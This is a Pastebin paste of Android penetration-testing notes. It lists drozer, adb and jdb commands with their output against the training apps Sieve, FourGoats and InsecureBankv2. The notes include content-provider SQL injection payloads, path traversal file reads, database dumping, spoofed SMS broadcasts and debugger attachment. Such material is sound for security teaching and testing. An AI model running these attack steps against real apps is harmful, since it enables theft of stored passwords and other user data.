Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- starting a drozer session
- $ adb forward tcp:31415 tcp:31415
- connecting a drozer
- $ drozer console connect
- Retrieving Package Information
- dz> run app.package.list -f sieve
- We can ask drozer to provide some basic information about the package using the `app.package.info` command
- dz> run app.package.info -a com.mwr.example.sieve
- Identify the Attack Surface
- dz> run app.package.attacksurface com.mwr.example.sieve
- Launching Activities
- dz> run app.activity.info -a com.mwr.example.sieve
- Package: com.mwr.example.sieve
- com.mwr.example.sieve.FileSelectActivity
- com.mwr.example.sieve.MainLoginActivity
- com.mwr.example.sieve.PWList
- Since this activity is exported and does not require any permission, we can ask drozer to launch it:
- dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
- Reading from Content Providers
- dz>run app.provider.info -a com.mwr.example.sieve
- Database-backed Content Providers (Data Leakage)
- drozer provides a scanner module that brings together various ways to guess paths and divine a list of accessible content URIs:
- dz> run scanner.provider.finduris -a com.mwr.example.sieve
- Scanning com.mwr.example.sieve...
- Unable to Query content://com.mwr.example.sieve.DBContentProvider/ ...
- Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
- Accessible content URIs:
- content://com.mwr.example.sieve.DBContentProvider/Keys/
- content://com.mwr.example.sieve.DBContentProvider/Passwords
- content://com.mwr.example.sieve.DBContentProvider/Passwords/
- We can now use other drozer modules to retrieve information from those content URIs, or even modify the data in the database:
- dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
- id: 1
- service: Email
- username: incognitoguy50
- password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64-encoded) email: incognitoguy50@gmail.com
- Database-backed Content Providers (SQL Injection)
- dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
- dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
- Android returns a very verbose error message, showing the entire query that it tried to execute.
- We can fully exploit this vulnerability to list all tables in the database:
- dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
- dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
- File System-backed Content Providers
- dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
- to dump the db to local machine
- dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data /data/com.mwr.example.sieve/databases/database.db /home/user/database.db
- Content Provider Vulnerabilities
- dz> run scanner.provider.injection -a com.mwr.example.sieve
- Scanning com.mwr.example.sieve...
- Injection in Projection:
- content://com.mwr.example.sieve.DBContentProvider/Keys/
- content://com.mwr.example.sieve.DBContentProvider/Passwords
- content://com.mwr.example.sieve.DBContentProvider/Passwords/
- Injection in Selection:
- content://com.mwr.example.sieve.DBContentProvider/Keys/
- content://com.mwr.example.sieve.DBContentProvider/Passwords
- content://com.mwr.example.sieve.DBContentProvider/Passwords/
- to test LFI OR file path travesals Or reading local files via vulnerble content providers in the app
- dz> run scanner.provider.traversal -a com.mwr.example.sieve
- Scanning com.mwr.example.sieve...
- Vulnerable Providers:
- content://com.mwr.example.sieve.FileBackupProvider/
- content://com.mwr.example.sieve.FileBackupProvider
- to read
- dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
- Interacting with Services
- dz> run app.service.info -a com.mwr.example.sieve
- Unintended Data Leakage
- pidcat
- $ pidcat com.mwr.example.sieve
- Insecure Data Storage
- root@cancro:/data/data/com.jianguo.funcontrol/shared_prefs # ls -al
- ls -al
- -rw-rw---- u0_a216 u0_a216 124 2015-12-19 13:51 AGREE_PROTOCOL.xml
- -rw-rw---- u0_a216 u0_a216 799 2016-02-06 18:42 CoreServicePrefs.xml
- -rw-rw---- u0_a216 u0_a216 127 2016-01-31 17:09 WebViewChromiumPrefs.xml
- -rw-rw---- u0_a216 u0_a216 226 2016-02-06 17:09 com.iflytek.msc.xml
- -rw-rw---- u0_a216 u0_a216 133 2016-01-31 17:09 com.jianguo.funcontrol_preferences.xml
- -rw-rw---- u0_a216 u0_a216 72801 2016-02-06 17:09 moive.sp.xml
- -rw-rw---- u0_a216 u0_a216 942 2016-02-06 18:42 umeng_general_config.xml
- root@cancro:/data/data/com.mwr.example.sieve # ls -al
- ls -al
- drwxrwx--x u0_a188 u0_a188 2015-08-03 20:51 cache
- drwxrwx--x u0_a188 u0_a188 2016-06-30 00:02 code_cache
- drwxrwx--x u0_a188 u0_a188 2014-08-01 22:32 databases
- lrwxrwxrwx root root 2016-06-29 22:36 lib -> /data/app-lib/com.mwr.example.sieve-1
- Insufficient Transport Layer Protection
- Burp Suite
- Unintended Data Leakage
- # String enetered: 123456
- pidcat com.mwr.example.sieve
- root@ubuntu:~# pidcat.py com.mwr.example.sieve
- art I Late-enabling -Xcheck:jni
- BoostFramework V mAcquireFunc method = public int com.qualcomm.qti.Performance.perfLockAcquire(int,int
- [])
- V mReleaseFunc method = public int com.qualcomm.qti.Performance.perfLockRelease()
- V mAcquireTouchFunc method = public int com.qualcomm.qti.Performance.perfLockAcquireTou
- ch(android.view.MotionEvent,android.util.DisplayMetrics,int,int[])
- V mIOPStart method = public int com.qualcomm.qti.Performance.perfIOPrefetchStart(int,ja
- va.lang.String)
- V mIOPStop method = public int com.qualcomm.qti.Performance.perfIOPrefetchStop()
- V BoostFramework() : mPerf = com.qualcomm.qti.Performance@817a13
- V BoostFramework() : mPerf = com.qualcomm.qti.Performance@804f450
- OpenGLRenderer D Use EGL_SWAP_BEHAVIOR_PRESERVED: true
- Adreno-EGL I <qeglDrvAPI_eglInitialize:379>: EGL 1.4 QUALCOMM build: Nondeterministic_AU_msm8974_L
- A.BF.1.1.3_RB1__release_AU (Ia10634f51b)
- I OpenGL ES Shader Compiler Version: E031.29.00.00
- I Build Date: 01/10/16 Sun
- I Local Branch: mybranch17687478
- I Remote Branch: quic/LA.BF.1.1.3_rb1.8
- I Local Patches: NONE
- I Reconstruct Branch: NOTHING
- OpenGLRenderer I Initialized EGL, version 1.4
- ActivityThread D Loading provider com.mwr.example.sieve.DBContentProvider: com.mwr.example.sieve.DBCon
- tentProvider
- m_MainLogin D String enetered: 123456
- Timeline I Timeline: Activity_launch_request time:7110102
- BoostFramework V BoostFramework() : mPerf = com.qualcomm.qti.Performance@c941a0f
- Attacking Services
- dz> run app.service.info --package org.owasp.goatdroid.fourgoats
- Package: org.owasp.goatdroid.fourgoats
- org.owasp.goatdroid.fourgoats.services.LocationService
- Permission: null
- Attacking Activities
- The components listed in the AndroidManifest.xml file
- dz> org.owasp.goatdroid.fourgoats -u
- Package: org.owasp.goatdroid.fourgoats
- Exported Activities:
- org.owasp.goatdroid.fourgoats.activities.Main
- org.owasp.goatdroid.fourgoats.activities.ViewCheckin
- org.owasp.goatdroid.fourgoats.activities.ViewProfile
- org.owasp.goatdroid.fourgoats.activities.SocialAPIAuthentication
- Activate the component
- dz> run app.activity.start --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.activities.ViewProfile
- Attacking Broadcast Receivers
- dz> run app.broadcast.info --package org.owasp.goatdroid.fourgoats
- Package: org.owasp.goatdroid.fourgoats
- org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver
- Permission: null
- If you would see in the AndroidManifest.xml file of FourGoats application then you will find action name is org.owasp.goatdroid.fourgoats.SOCIAL_SMS and component name as org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver . So we have to set these parameters in drozer accordingly.
- dz> run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234 --extra string message "it's test"
- or directly use
- adb shell
- am broadcast -a theBroadcast -n com.android.insecurebankv2/com.android.insecurebankv2.MyBroadCastReceiver --es phonenumber 5554 βes newpass qwreet@123!
- Exploiting Debuggable Applications
- $ adb jdwp
- 347
- 602
- 710
- 724
- 737
- 811
- 929
- 1202
- 1320
- 1362
- 1383
- 1405
- 1931
- 2022
- 2207
- 2222
- 2239
- 2253
- 2269
- 2283
- 2310
- $ adb shell ps | grep '1931'
- u0_a59 1931 177 572536 33484 ffffffff b769007b S com.mwr.example.sieve:remote
- C:\Users\syandava\Desktop\sieve\dist
- $ adb shell ps | grep sieve
- u0_a59 1320 177 570756 43612 ffffffff b769007b S com.mwr.example.sieve
- u0_a59 1931 177 572536 33484 ffffffff b769007b S com.mwr.example.sieve:remote
- $ adb shell
- root@vbox86p:/ # run-as com.mwr.example.sieve
- run-as com.mwr.example.sieve
- root@vbox86p:/data/data/com.mwr.example.sieve $ ls -l
- ls -l
- drwxrwx--x u0_a59 u0_a59 2017-12-05 06:24 cache
- drwxrwx--x u0_a59 u0_a59 2017-12-05 06:24 databases
- lrwxrwxrwx install install 2017-12-05 22:42 lib -> /data/app-lib/com.mwr.example.sieve-1
- root@vbox86p:/data/data/com.mwr.example.sieve $ exit
- exit
- root@vbox86p:/ # exit
- exit
- C:\Users\syandava\Desktop\sieve\dist
- $ adb shell run-as com.mwr.example.sieve /data/data/
- run-as: exec failed for /data/data/ Error:Permission denied
- And Some other ways
- $ adb jdwp
- Next we'll need to forward our debugging session to a port we can connect to with our debugger:
- $adb forward tcp:8000 jdwp:498
- Finally we can attach the debugger with:
- $jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=8000
Add Comment
Please, Sign In to add comment